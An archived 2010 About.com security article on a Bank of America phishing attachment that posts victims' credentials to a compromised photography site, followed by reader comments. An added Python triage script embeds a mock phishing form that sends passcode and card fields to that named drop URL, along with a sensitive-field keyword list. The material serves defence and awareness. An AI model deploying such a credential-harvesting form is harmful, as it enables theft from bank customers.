
That Phish Smells Good...

From Mary Landesman, About.com Guide   August 27, 2010


Ned Scott was a Hollywood still photographer in the middle of the 20th century, and TheNedScottArchive.com is an effort by his son, Norm Scott, to memorialize the black-and-white artistry of his dad. Unfortunately, however, thenedscottarchive.com is also a compromised website which, presumably unbeknownst to its owner, is serving as the collection point for credentials harvested in a Bank of America phishing scam.

The phishing scam arrives via an email carrying an attachment named "Account Verification File .html" (the extraneous space before the extension is part of the filename). The subject line of the email is "Irregular Card Activity" and the body of the email message reads in part:

We detected irregular activity on your BankOfAmerica Card on 08/25/2010.
For your protection, you must verify this activity before you can continue using your card.
Please download the file attached to this email and fill out the information to review your account.
We will review the activity on your account with you and upon verification, we will remove any restrictions placed on your account.

Your first reaction might be to scan the attachment with your antivirus software. But as seen in this VirusTotal report, none of the 42 scanners tested see anything amiss with the file attachment.

Antivirus software is largely signature-based, and therefore reactive, so it's no surprise that all 42 of the scanners tested failed to detect this threat. Would there be better luck with one of the online analysis tools that don't rely on signatures? Unfortunately not: both JSunpack and Wepawet also saw the file as benign.

On the plus side, Wepawet did unpack the source code, enabling a close manual inspection of the contents. That inspection revealed that the submitted data was being processed not by Bank of America, but rather by http://thenedscottarchive.com/includes/js/verificare.php. Sadly, even with that obviously malicious form target in plain view, Wepawet still returned a "benign" verdict for the file. Perhaps worse, a URL check of http://thenedscottarchive.com/includes/js/verificare.php reveals that 7 out of 7 anti-phishing tools proclaim it a "Clean site".

So what's the lesson here?

Compromised websites are a clever and very effective way for attackers to hide their malcode. A vote of "Clean site" is all but meaningless in today's hostile Web environment. Reputation scanners don't base their decision on the code contained on the site, nor on the present condition of the site, but rather on what's known about the website from the past.

Second, when it does come to analyzing malcode via an automated analysis tool, take any report of "benign" with a grain of salt. Instead, read through the code line by line so you can make the proper determination yourself.

And third, just because 42 antivirus scanners don't detect malware in a file, it doesn't mean the file is safe.
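The manual inspection described above (finding where the attachment's form actually posts) can be partly automated. The script below is an added example and is not code from the original article or from any of the tools it mentions: it parses an HTML attachment with Python's standard library, lists every form, and flags any form that collects passwords or card data while posting to a host outside the brand's own domains. The sample attachment is constructed for this example; its markup, field names and the bankofamerica.com brand domain are assumptions, while the drop URL is the one named in the article.

```python
"""Static triage of an HTML phishing attachment: where do its forms post?"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the attachment described in the article.
# The markup and field names are assumptions; the form action is the
# verificare.php drop URL the article names.
SAMPLE_ATTACHMENT = """
<html><head><title>Bank of America | Account Verification</title></head>
<body>
<img src="https://www.bankofamerica.com/images/logo.gif">
<form method="POST" action="http://thenedscottarchive.com/includes/js/verificare.php">
  Online ID: <input type="text" name="onlineid">
  Passcode: <input type="password" name="passcode">
  Card number: <input type="text" name="cardnumber">
  <input type="submit" value="Verify">
</form>
<form method="GET" action="https://www.bankofamerica.com/search">
  <input type="text" name="q">
</form>
</body></html>
"""

# Assumption: the domains the impersonated brand legitimately uses.
BRAND_DOMAINS = {"bankofamerica.com"}
# Heuristic substrings marking fields that should never leave the brand.
SENSITIVE_FIELDS = {"pass", "pin", "card", "ssn", "cvv", "account"}


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # attribute values may be None
        if tag == "form":
            self._current = {
                "action": attrs.get("action") or "",
                "method": (attrs.get("method") or "GET").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append({
                "type": (attrs.get("type") or "text").lower(),
                "name": (attrs.get("name") or "").lower(),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_of(action):
    """Hostname of a form action, or '' for relative/empty/javascript: actions."""
    return (urlparse(action).hostname or "").lower()


def is_brand_host(host, brand_domains):
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def collects_secrets(form):
    for field in form["fields"]:
        if field["type"] == "password":
            return True
        if any(key in field["name"] for key in SENSITIVE_FIELDS):
            return True
    return False


def triage(html, brand_domains=BRAND_DOMAINS):
    """Return forms that send sensitive fields to a host outside the brand."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        host = host_of(form["action"])
        # A relative or empty action posts back to the local file, which is
        # odd for a bank form but is not a remote drop site; skip it here.
        if host and not is_brand_host(host, brand_domains) and collects_secrets(form):
            findings.append({
                "action": form["action"],
                "host": host,
                "method": form["method"],
                "fields": [f["name"] for f in form["fields"] if f["name"]],
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_ATTACHMENT):
        print(f"OFF-BRAND {finding['method']} to {finding['host']}: "
              f"{finding['action']} fields={finding['fields']}")
```

The check only sees forms written as static markup. A kit that builds the form or its action in JavaScript, or that obfuscates the target, will slip past it, which is exactly why the article's advice to read the unpacked source line by line still stands; treat this as a first pass that tells you where to look, not as a verdict.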

For those not skilled in reading source code, just know that your bank will not send you an unsolicited email attachment. If you do receive a notice from your bank via email, do not open any attachments or click any links in that email. Instead, visit your bank in person, or call them on the phone using the number on the back of your bank card, or log in to your online account by typing the URL into the browser directly and check for any valid bank messages that appear in your account screens.

Comments
September 1, 2010 at 4:26 pm
(1) Jack Heisler :

Thank You ever so much for the valuable information contained within this article. I’ll be alerting others. You have been previously helpful in many ways. With much thanks.

September 1, 2010 at 4:55 pm
(2) Roz :

But surely nobody would ever open an email thus addressed. Obviously I cannot be certain on how the banking system works in the US, or even most of the UK banks. What I do know is that each and every time I go to log on to my own bank I am informed that they would never ever send out such an email. They also include the same message on a regular basis in my account.

I often receive emails of the nature mentioned above. Sometimes they come from banks I have never even heard of, but mostly from the big five UK banks, never from my own, I am delighted to say. I have only ever banked with one of them anyway, and that was way back in the days before home computers, let alone the Internet. So I never even open the email, let alone any attachment. I just dump them in the bin.

Should there ever be a problem with my bank account, usually if I have keyed in the wrong numbers three times, I have to contact the bank myself to sort it out. Actually it would be incredibly difficult for them to contact me by email as unless they are mind readers they don’t have my email address.

September 1, 2010 at 9:22 pm
(3) ron :

This is a great example to use for teaching the "unwashed masses" about the limits of existing anti-malware.

Roz:
Yes people will open it. Many people will open it, that is why it is a phishing attack. I recently read about a “nice little old lady” who sent over 1/2 million dollars to phishers. Much of it was sent even after it was clearly explained to her that she was being scammed. There are LOTS of people on the internet, it only takes an extremely tiny percentage of them to be gullible for a scam to be profitable.

September 3, 2010 at 1:13 am
(4) Walter :

No software will just conveniently and automatically spot phishing schemes if cleverly concealed. I tried the URL, just for fun, on my Firefox bad site locator. I use Ubuntu. It seems that Google, the reference, tested the site and found no technical reason to call it bad. Interestingly, I tried a couple of Linux user forums, and it popped right up. People using those forums also used their heads; they contacted the bank first and found the message to be a phony.


©2012 About.com. All rights reserved. 

A part of The New York Times Company.